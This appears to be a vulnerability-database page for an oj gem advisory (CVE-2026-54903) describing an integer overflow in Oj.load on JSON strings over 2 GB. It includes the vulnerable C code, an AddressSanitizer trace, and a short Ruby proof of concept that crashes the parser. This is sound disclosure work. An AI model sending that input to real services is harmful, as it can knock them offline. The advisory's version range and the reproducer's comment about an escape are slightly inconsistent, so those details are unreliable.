GHSA-475M-PH3X-64GP
Vulnerability from github – Published: 2026-06-19 20:47 – Updated: 2026-06-19 20:47
VLAI
Summary
Oj: Integer Overflow in Oj.load 2GB String Handling
Details
Summary
Oj.load is vulnerable to heap corruption when parsing a JSON string longer than 2 GB. An integer overflow in buf_append_string (buf.h:61) converts the string length to a large negative size_t, causing memcpy to copy an astronomically large amount of data out of bounds. This crashes the process and can corrupt adjacent heap memory.
Version
- Software: oj gem
- Affected: all versions with
ext/oj/buf.handext/oj/parse.c - Latest tested: 3.17.1 (confirmed present)
Details
ext/oj/buf.h, line 61:
inline static void buf_append_string(Buf buf, const char *s, size_t slen) {
// ...
memcpy(buf->tail, s, slen); // slen derived from 32-bit int that wrapped negative
In parse.c, escape sequence handling computes the remaining string length as an int:
// parse.c:402 (read_escaped_str)
int slen = (int)(s - str); // ← wraps to negative when string > 2 GB
buf_append_string(buf, str, (size_t)slen); // ← (size_t)(-2147483648) = 0x80000000...
ASAN report:
==399019==ERROR: AddressSanitizer: negative-size-param: (size=-2147483648)
#0 __asan_memcpy
#1 buf_append_string /ext/oj/buf.h:61
#2 read_escaped_str /ext/oj/parse.c:402
#3 read_str /ext/oj/parse.c:542
#4 oj_parse2 /ext/oj/parse.c:882
#5 oj_pi_parse /ext/oj/parse.c:1256
#6 oj_object_parse /ext/oj/object.c:701
#7 load /ext/oj/oj.c:1259
0x7f5a26ff0801 is located 1 bytes inside of 2147483657-byte region [0x7f5a26ff0800, 0x7f5aa6ff0809)
Reproduce
require 'oj'
n = 1 << 31 # 2 GB
json = '"' + ('A' * n) + 'A"' # >2GB JSON string with a trailing escape
Oj.load(json)
Severity
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c 3.17.2"
},
"package": {
"ecosystem": "RubyGems",
"name": "oj"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.17.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54903"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-19T20:47:31Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\n`Oj.load` is vulnerable to heap corruption when parsing a JSON string longer than 2 GB. An integer overflow in `buf_append_string` (`buf.h:61`) converts the string length to a large negative `size_t`, causing `memcpy` to copy an astronomically large amount of data out of bounds. This crashes the process and can corrupt adjacent heap memory.\n\n### Version\n\n- **Software**: oj gem\n- **Affected**: all versions with `ext/oj/buf.h` and `ext/oj/parse.c`\n- **Latest tested**: 3.17.1 (confirmed present)\n\n### Details\n\n`ext/oj/buf.h`, line 61:\n\n```c\ninline static void buf_append_string(Buf buf, const char *s, size_t slen) {\n // ...\n memcpy(buf-\u003etail, s, slen); // slen derived from 32-bit int that wrapped negative\n```\n\nIn `parse.c`, escape sequence handling computes the remaining string length as an `int`:\n\n```c\n// parse.c:402 (read_escaped_str)\nint slen = (int)(s - str); // \u2190 wraps to negative when string \u003e 2 GB\nbuf_append_string(buf, str, (size_t)slen); // \u2190 (size_t)(-2147483648) = 0x80000000...\n```\n\nASAN report:\n```\n==399019==ERROR: AddressSanitizer: negative-size-param: (size=-2147483648)\n #0 __asan_memcpy\n #1 buf_append_string /ext/oj/buf.h:61\n #2 read_escaped_str /ext/oj/parse.c:402\n #3 read_str /ext/oj/parse.c:542\n #4 oj_parse2 /ext/oj/parse.c:882\n #5 oj_pi_parse /ext/oj/parse.c:1256\n #6 oj_object_parse /ext/oj/object.c:701\n #7 load /ext/oj/oj.c:1259\n0x7f5a26ff0801 is located 1 bytes inside of 2147483657-byte region [0x7f5a26ff0800, 0x7f5aa6ff0809)\n```\n\n### Reproduce\n\n```ruby\nrequire \u0027oj\u0027\nn = 1 \u003c\u003c 31 # 2 GB\njson = \u0027\"\u0027 + (\u0027A\u0027 * n) + \u0027A\"\u0027 # \u003e2GB JSON string with a trailing escape\nOj.load(json)\n```",
"id": "GHSA-475m-ph3x-64gp",
"modified": "2026-06-19T20:47:31Z",
"published": "2026-06-19T20:47:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ohler55/oj/security/advisories/GHSA-475m-ph3x-64gp"
},
{
"type": "PACKAGE",
"url": "https://github.com/ohler55/oj"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Oj: Integer Overflow in Oj.load 2GB String Handling"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…